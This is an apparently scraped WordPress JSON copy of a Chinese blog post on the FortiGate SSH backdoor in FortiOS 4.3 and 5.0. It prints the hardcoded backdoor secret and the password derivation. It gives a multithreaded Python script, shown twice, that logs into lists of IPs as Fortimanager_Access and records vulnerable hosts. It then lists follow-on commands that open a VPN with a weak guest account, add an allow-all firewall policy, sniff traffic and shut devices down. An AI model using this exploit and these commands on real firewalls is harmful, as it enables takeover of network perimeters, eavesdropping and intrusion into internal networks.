style="font-size:12px;">                <\/span><span style="font-size:12px;">pass<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">finally:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">def scan_thread(targetIP):<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global threadCount<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global mutex<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global scanCount<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">#lock<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">if mutex.acquire():<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">threadCount+=1<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">mutex.release()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">try:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">scan_host(targetIP)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">except:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">pass<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">finally:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">if mutex.acquire():<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">threadCount-=1<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">scanCount+=1<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">mutex.release()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">return<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">def main():<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global threadCount<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global results_fd<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global scanCount<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">host_file=open(“port22.txt”,”r”)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">results_fd=open(“fgt_ssh_backdoor.txt”,”wt”)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">while True:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">readBuff=host_file.readline()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">if len(readBuff)<3:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">break<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">targetIP=readBuff[:len(readBuff)-1]<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">while threadCount>1000:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">pass<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">threading.Thread(target=scan_thread, args=(targetIP,)).start()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">print “target:”+targetIP+”\\t”+”thread count:”+str(threadCount)+”\\tscan count:”+str(scanCount)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">if __name__ == ‘__main__’:<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">main()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t <\/p>\n<\/div>

 \u6f0f\u6d1e\u6982\u8981<\/span><\/b><\/span><\/b> <\/p>\n

\n\t    FortiiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u662f\u7531Fortinet\uff08\u98de\u5854\uff09\u516c\u53f8\u63a8\u51fa\u7684\u7f51\u7edc\u9632\u706b\u5899\u4ea7\u54c1\uff0c\u5305\u62ec\u9ad8\u6027\u80fd\u6570\u636e\u4e2d\u5fc3\u9632\u706b\u5899\u548cNGFW\uff08\u4e0b\u4e00\u4ee3\u9632\u706b\u5899\uff09\u4ee5\u53caUTM\uff08 \u7edf\u4e00\u5a01\u80c1\u7ba1\u7406\uff09\u3002\u8fd9\u6b21\u66b4\u51fa\u6765\u7684\u662f\u4e00\u4e2assh\u540e\u95e8\uff0c\u653b\u51fb\u8005\u80fd\u5229\u7528\u6b64\u540e\u95e8\u76f4\u63a5\u83b7\u53d6Fortigate\u6700\u9ad8\u7ba1\u7406\u6743\u9650\uff0c\u53ef\u4ee5\u63a7\u5236\u8bbe\u5907\u8fdb\u884c\u6bd4\u5982\u6293\u53d6\u6d41\u91cf\u76d1\u542c\uff0cdns\u6b3a\u9a97\uff0c\u5efa\u7acb\u96a7\u9053\u8fdb\u5165\u4f01\u4e1a\u5185\u7f51\u7b49\u653b\u51fb\u884c\u4e3a\u3002\n<\/p>\n

\n\t \n<\/p>\n

\n\t\u5f71\u54cd\u8303\u56f4<\/span><\/span><\/b>\n<\/p>\n

\n\tFortiOS 4.3.0-4.3.16 <\/span>\u3000\u3000<\/span><\/span>\n<\/p>\n

\n\tFortiOS 5.0.0-5.0.7<\/span>\n<\/p>\n

\n\t \n<\/p>\n

\n\t\u6f0f\u6d1e\u5206\u6790<\/span><\/span><\/b>\n<\/p>\n

\n\t     <\/span><\/span>\u8fd9\u4e2a\u540e\u95e8\u91c7\u7528\u4e86\u8d28\u7591\/<\/span>\u5e94\u7b54\u8eab\u4efd\u8ba4\u8bc1\u6a21\u5f0f\uff1a<\/span><\/span>\n<\/p>\n

\n\t1\u3001  <\/span><\/span><\/span>\u5ba2\u6237\u7aef\u5411\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2a\u9a8c\u8bc1\u8bf7\u6c42\uff0c\u5982\uff1assh Fortimanager_Access@<\/span><\/span><\/span><\/a><\/span><\/span><\/span> <\/span><\/span><\/span>1.1.1.1<\/span>\n<\/p>\n

\n\t2\u3001  <\/span><\/span><\/span>\u670d\u52a1\u5668\u63a5\u5230\u6b64\u8bf7\u6c42\u540e\u751f\u6210\u4e00\u4e2a\u968f\u673a\u6570\u4f20\u8f93\u7ed9\u5ba2\u6237\u7aef\uff08\u6b64\u4e3a\u8d28\u7591\uff09\u3002<\/span><\/span>\n<\/p>\n

\n\t3\u3001  <\/span><\/span><\/span>\u5ba2\u6237\u7aef\u5c06\u63a5\u6536\u5230\u7684\u968f\u673a\u6570\u5f53\u5bc6\u94a5\u7ed3\u5408\u81ea\u5df1\u6240\u6301\u7684\u5b57\u7b26\u4e32\u8ba1\u7b97\u5c31\u80fd\u5f97\u5230\u5bc6\u7801\uff08\u6b64\u4e3a\u5e94\u7b54\uff09\u3002<\/span><\/span>\n<\/p>\n

\n\t \n<\/p>\n

\n\tPOC<\/span><\/b>\u6d41\u7a0b\u5206\u6790<\/span><\/span><\/b>\n<\/p>\n

\n\t\u8be5\u8bbe\u5907\u7684SSH<\/span>\u767b\u9646\u65b9\u5f0f\u91c7\u7528\u4ea4\u4e92\u5f0f\u9a8c\u8bc1\uff0cPOC<\/span>\u6d41\u7a0b\u5206\u89e3\u5982\u4e0b\uff1a<\/span><\/span>\n<\/p>\n

\n\t1\u3001  <\/span><\/span><\/span>\u5ba2\u6237\u7aef\u53d1\u8d77ssh<\/span>\u8fde\u63a5\u8bf7\u6c42\u3002<\/span><\/span>\n<\/p>\n

\n\t2\u3001  <\/span><\/span><\/span>\u670d\u52a1\u7aef\u8fd4\u56de\u4e00\u4e2a\u968f\u673a\u5b57\u7b26\u4e32\u3002<\/span><\/span>\n<\/p>\n

\n\t3\u3001  <\/span><\/span><\/span>\u5ba2\u6237\u7aef\u83b7\u53d6\u8fd9\u4e2a\u968f\u673a\u5b57\u7b26\u4e32\u540e\u7ed3\u5408\u672c\u5730\u6240\u6301\u6709\u7684\u5b57\u7b26\u4e32\u683c\u5f0f\u5316\u4e3a\u65b0\u4e32\uff1a<\/span><\/span>\n<\/p>\n

\n\t12<\/span>\u5b57\u8282\u7684\\x00<\/span>\u5b57\u7b26+<\/span>\u968f\u673a\u5b57\u7b26\u4e32+’FGTAbc11*xy+Qqz27’+<\/span><\/span> <\/span>‘\\xA3\\x88\\xBA\\x2E\\x42\\x4C\\xB0\\x4A\\x53\\x79\\x30\\xC1\\x31\\x07\\xCC\\x3F\\xA1\\x32\\x90\\x29\\xA9\\x81\\x5B\\x70’<\/span>\n<\/p>\n

\n\t4\u3001  <\/span><\/span><\/span>\u4f7f\u7528SHA1<\/span>\u7b97\u6cd5\u8ba1\u7b97\u4e0a\u8ff0\u5b57\u7b26\u4e32\u7684\u6458\u8981\uff0c\u8bb0\u4f5cdigest.<\/span><\/span>\n<\/p>\n

\n\t5\u3001  <\/span><\/span><\/span>\u5728digest<\/span>\u5b57\u7b26\u4e32\u524d\u6dfb\u52a012<\/span>\u5b57\u8282\u7684\\x00<\/span>\u5b57\u7b26\u540e\u8fdb\u884cbase64<\/span>\u7f16\u7801\u3002<\/span><\/span>\n<\/p>\n

\n\t6\u3001  <\/span><\/span><\/span>\u5728\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32\u524d\u6dfb\u52a0\u2019AK1\u2019<\/span>\u5b57\u7b26\u3002<\/span><\/span>\n<\/p>\n

\n\t7\u3001  <\/span><\/span><\/span>\u6700\u540e\u6240\u5f97\u5b57\u7b26\u4e32\u4e3a\u5bc6\u7801\u3002<\/span><\/span>\n<\/p>\n

\n\t<\/span><\/b> \n<\/p>\n

\n\t\u6f0f\u6d1e\u9a8c\u8bc1<\/span><\/span><\/b>\n<\/p>\n

\n\t\u8d28\u7591\uff1a<\/span>\n<\/p>\n

\n\t\"1.jpg\"<\/a><\/span><\/span>\n<\/p>\n

\n\t<\/span><\/span><\/b>\n<\/p>\n

\n\t\u5e94\u7b54\uff1a<\/span>\n<\/p>\n

\n\t\"2.jpg\"<\/a><\/span><\/span>\n<\/p>\n

\n\t\u56fd\u5185\u5171\u68c0\u6d4b\u51fa\u53d7\u5f71\u54cd\u7684\u8bbe\u5907\uff1a\n<\/p>\n

\"results.jpg\"<\/a> <\/p>\n

\n\t \n<\/p>\n

\n\t\u6f0f\u6d1e\u5229\u7528<\/strong><\/span>
\n \u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6\u5230\u9632\u706b\u5899\u7684root\u6743\u9650\uff0c\u6240\u6709\u9632\u706b\u5899\u7684\u64cd\u4f5c\u90fd\u53ef\u4ee5\u505a\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u521b\u5efaVPN\u7684\u65b9\u5f0f\u7ee7\u7eed\u8fdb\u884c\u5185\u7f51\u6e17\u900f\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528\u9632\u706b\u5899\u81ea\u5e26\u7684\u6293\u5305\u529f\u80fd\u76d1\u542c\u6d41\u91cf\u3002\n<\/p>\n

\n\t1\u3001\u67e5\u770b\u7cfb\u7edf\u72b6\u6001
\nget system status\n<\/p>\n

\n\t2\u3001\u521b\u5efaVPN\uff0c\u8fde\u63a5\u540e\u53ef\u7528nmap\u5bf9\u5185\u7f51\u8fdb\u884c\u626b\u63cf\u3002
\nconfig vpn pptp
\nset status enable
\nset eip 192.168.200.100
\nset sip 192.168.200.1
\nset usrgrp Guest-group
\nend
\nconfig user local
\nedit “guest”
\nset type password
\nset passwd 123456
\nnext
\nend
\nconfig user group
\nedit “Guest-group”
\nset profile “unfiltered”
\nset member “guest”
\nnext
\nend
\nconfig firewall policy
\nedit 9
\nset srcintf “wan1”
\nset dstintf “internal”
\nset srcaddr “all”
\nset dstaddr “all”
\nset action accept
\nset schedule “always”
\nset service “ANY”
\nnext
\nend\n<\/p>\n

\n\t3\u3001\u76d1\u542c\u6d41\u91cf
\ndiag sniffer packet any none 3 \u6355\u83b7\u6240\u6709\u63a5\u53e3\u7684\u6570\u636e\u5305\n<\/p>\n

\n\t3\u3001\u67e5\u770b\u5168\u5c40\u8def\u7531\u8868
\nget router info routing-table all\n<\/p>\n

\n\t4\u3001\u67e5\u770bDNS
\nshow system dns\n<\/p>\n

\n\t5\u3001\u521b\u5efa\u9759\u6001NAT
\nconfig firewall vip
\nedit “NAT_200.1.1.10”
\nset extip 200.1.1.10
\nset extintf “port1”
\nset mappedip 10.1.1.10 
\nnext
\nend\n<\/p>\n

\n\t6\u3001\u5173\u95ed\/\u91cd\u542f\u8bbe\u5907
\nexec shutdown
\nexec reboot \n<\/p>\n

\n\t<\/span><\/span><\/b>\n<\/p>\n

\n\t<\/span><\/b>\n<\/p>\n

\n\t\u516c\u7f51\u626b\u63cf\u4ee3\u7801\uff1a<\/span><\/span><\/b>\n<\/p>\n

 <\/p>\n

\n\timport socket<\/span>\n<\/p>\n

\n\timport select<\/span>\n<\/p>\n

\n\timport sys<\/span>\n<\/p>\n

\n\timport paramiko<\/span>\n<\/p>\n

\n\tfrom paramiko.py3compat import u<\/span>\n<\/p>\n

\n\timport base64<\/span>\n<\/p>\n

\n\timport hashlib<\/span>\n<\/p>\n

\n\timport termios<\/span>\n<\/p>\n

\n\timport tty<\/span>\n<\/p>\n

\n\timport thread<\/span>\n<\/p>\n

\n\timport time<\/span>\n<\/p>\n

\n\timport threading<\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\tresults_fd=”<\/span>\n<\/p>\n

\n\tthreadCount=0<\/span>\n<\/p>\n

\n\tscanCount=0<\/span>\n<\/p>\n

\n\tmutex=thread.allocate_lock()<\/span>\n<\/p>\n

\n\tfile_mutex=thread.allocate_lock()<\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\tdef custom_handler(title, instructions, prompt_list):<\/span>\n<\/p>\n

\n\t    <\/span>n = prompt_list[0][0]<\/span><\/span>\n<\/p>\n

\n\t    <\/span>m = hashlib.sha1()<\/span><\/span>\n<\/p>\n

\n\t    <\/span>m.update(‘\\x00’ * 12)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>m.update(n + ‘FGTAbc11*xy+Qqz27’)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>m.update(‘\\xA3\\x88\\xBA\\x2E\\x42\\x4C\\xB0\\x4A\\x53\\x79\\x30\\xC1\\x31\\x07\\xCC\\x3F\\xA1\\x32\\x90\\x29\\xA9\\x81\\x5B\\x70’)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>h = ‘AK1’ + base64.b64encode(‘\\x00’ * 12 + m.digest())<\/span><\/span>\n<\/p>\n

\n\t    <\/span>return [h]<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\tdef scan_host(targetIP):<\/span>\n<\/p>\n

\n\t    <\/span>global file_mutex<\/span><\/span>\n<\/p>\n

\n\t    <\/span>global results_fd<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>client = paramiko.SSHClient()<\/span><\/span>\n<\/p>\n

\n\t    <\/span>client.set_missing_host_key_policy(paramiko.AutoAddPolicy())<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>try:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>client.connect(targetIP, username=”, allow_agent=False, look_for_keys=False,timeout=5)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>except paramiko.ssh_exception.SSHException:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>#print “debug:connect error”<\/span><\/span>\n<\/p>\n

\n\t        <\/span>pass<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>trans = client.get_transport()<\/span><\/span>\n<\/p>\n

\n\t    <\/span>try:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>trans.auth_password(username=’Fortimanager_Access’, password=”, event=None, fallback=True)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>except paramiko.ssh_exception.AuthenticationException:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>#print “debug:auth failed”<\/span><\/span>\n<\/p>\n

\n\t        <\/span>pass<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>trans.auth_interactive(username=’Fortimanager_Access’, handler=custom_handler)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>chan = client.invoke_shell()<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>oldtty = termios.tcgetattr(sys.stdin)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>try:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>tty.setraw(sys.stdin.fileno())<\/span><\/span>\n<\/p>\n

\n\t        <\/span>tty.setcbreak(sys.stdin.fileno())<\/span><\/span>\n<\/p>\n

\n\t        <\/span>chan.settimeout(0.0)<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t        <\/span>r, w, e = select.select([chan, sys.stdin], [], [])<\/span><\/span>\n<\/p>\n

\n\t        <\/span>if chan in r:<\/span><\/span>\n<\/p>\n

\n\t       <\/span>     <\/span>try:<\/span><\/span>\n<\/p>\n

\n\t                <\/span>x = u(chan.recv(1024))<\/span><\/span>\n<\/p>\n

\n\t                <\/span>if len(x) == 0:<\/span><\/span>\n<\/p>\n

\n\t                    <\/span>sys.stdout.write(‘\\r\\n*** EOF\\r\\n’)<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t                <\/span>sys.stdout.write(x)<\/span><\/span>\n<\/p>\n

\n\t                <\/span>sys.stdout.flush()<\/span><\/span>\n<\/p>\n

\n\t                <\/span>#available<\/span><\/span>\n<\/p>\n

\n\t                <\/span>if file_mutex.acquire():<\/span><\/span>\n<\/p>\n

\n\t                    <\/span>results_fd.seek(0,2)<\/span><\/span>\n<\/p>\n

\n\t                    <\/span>results_fd.write(targetIP+”\\n”)<\/span><\/span>\n<\/p>\n

\n\t                    <\/span>results_fd.flush()<\/span><\/span>\n<\/p>\n

\n\t                    <\/span>file_mutex.release()<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t            <\/span>except socket.timeout:<\/span><\/span>\n<\/p>\n

\n\t                <\/span>#print “debug:socket timeout”<\/span><\/span>\n<\/p>\n

\n\t                <\/span>pass<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>finally:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\tdef scan_thread(targetIP):<\/span>\n<\/p>\n

\n\t    <\/span>global threadCount<\/span><\/span>\n<\/p>\n

\n\t    <\/span>global mutex<\/span><\/span>\n<\/p>\n

\n\t    <\/span>global scanCount<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>#lock<\/span><\/span>\n<\/p>\n

\n\t    <\/span>if mutex.acquire():<\/span><\/span>\n<\/p>\n

\n\t        <\/span>threadCount+=1<\/span><\/span>\n<\/p>\n

\n\t        <\/span>mutex.release()<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>try:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>scan_host(targetIP)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>except:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>pass<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>finally:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>if mutex.acquire():<\/span><\/span>\n<\/p>\n

\n\t            <\/span>threadCount-=1<\/span><\/span>\n<\/p>\n

\n\t            <\/span>scanCount+=1<\/span><\/span>\n<\/p>\n

\n\t            <\/span>mutex.release()<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>return<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\tdef main():<\/span>\n<\/p>\n

\n\t    <\/span>global threadCount<\/span><\/span>\n<\/p>\n

\n\t    <\/span>global results_fd<\/span><\/span>\n<\/p>\n

\n\t    <\/span>global scanCount<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>host_file=open(“port22.txt”,”r”)<\/span><\/span>\n<\/p>\n

\n\t    <\/span>results_fd=open(“fgt_ssh_backdoor.txt”,”wt”)<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t    <\/span>while True:<\/span><\/span>\n<\/p>\n

\n\t        <\/span>readBuff=host_file.readline()<\/span><\/span>\n<\/p>\n

\n\t        <\/span>if len(readBuff)<3:<\/span><\/span>\n<\/p>\n

\n\t            <\/span>break<\/span><\/span>\n<\/p>\n

\n\t        <\/span>targetIP=readBuff[:len(readBuff)-1]<\/span><\/span>\n<\/p>\n

\n\t        <\/span>while threadCount>1000:<\/span><\/span>\n<\/p>\n

\n\t            <\/span>pass<\/span><\/span>\n<\/p>\n

\n\t        <\/span>threading.Thread(target=scan_thread, args=(targetIP,)).start()<\/span><\/span>\n<\/p>\n

\n\t<\/span>\n<\/p>\n

\n\t        <\/span>print “target:”+targetIP+”\\t”+”thread count:”+str(threadCount)+”\\tscan count:”+str(scanCount)<\/span><\/span>\n<\/p>\n

\n\tif __name__ == ‘__main__’:<\/span>\n<\/p>\n

\n\t    <\/span>main()<\/span><\/span>\n<\/p>\n

\n\t <\/p>\n<\/div><\/div>","protected":false},"excerpt":{"rendered":"

 <\/p>\n

\n\t\u6f0f\u6d1e\u6982\u8981<\/span><\/b>\n<\/p>\n

\n\tFortiiGate<\/span>\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u662f\u7531Fortinet<\/span>\uff08\u98de\u5854\uff09\u516c\u53f8\u63a8\u51fa\u7684\u7f51\u7edc\u9632\u706b\u5899\u4ea7\u54c1\uff0c\u5305\u62ec\u9ad8\u6027\u80fd\u6570\u636e\u4e2d\u5fc3\u9632\u706b\u5899\u548cNGFW<\/span>\uff08\u4e0b\u4e00\u4ee3\u9632\u706b\u5899\uff09\u4ee5\u53caUTM<\/span>\uff08 \u7edf\u4e00\u5a01\u80c1\u7ba1\u7406\uff09\u3002\u8fd9\u6b21\u66b4\u51fa\u6765\u7684\u662f\u4e00\u4e2assh<\/span>\u540e\u95e8\uff0c\u653b\u51fb\u8005\u80fd\u5229\u7528\u6b64\u540e\u95e8\u76f4\u63a5\u83b7\u53d6Fortigate<\/span>\u6700\u9ad8\u7ba1\u7406\u6743\u9650\uff0c\u53ef\u4ee5\u63a7\u5236\u8bbe\u5907\u8fdb\u884c\u6bd4\u5982\u6293\u53d6\u6d41\u91cf\u76d1\u542c\uff0cdns<\/span>\u6b3a\u9a97\uff0c\u5efa\u7acb\u96a7\u9053\u8fdb\u5165\u4f01\u4e1a\u5185\u7f51\u7b49\u653b\u51fb\u884c\u4e3a\u3002<\/span>\n<\/p>\n

\n\t\u5f71\u54cd\u8303\u56f4<\/span><\/b>\n<\/p>\n

\n\tFortiOS 4.3.0-4.3….<\/span>\n<\/p>\n

\n\t<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[],"class_list":["post-159","post","type-post","status-publish","format-standard","hentry"],"yoast_head":"\n\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b - Wayne's Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=159\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b - Wayne's Blog\" \/>\n<meta property=\"og:description\" content=\"  \u6f0f\u6d1e\u6982\u8981 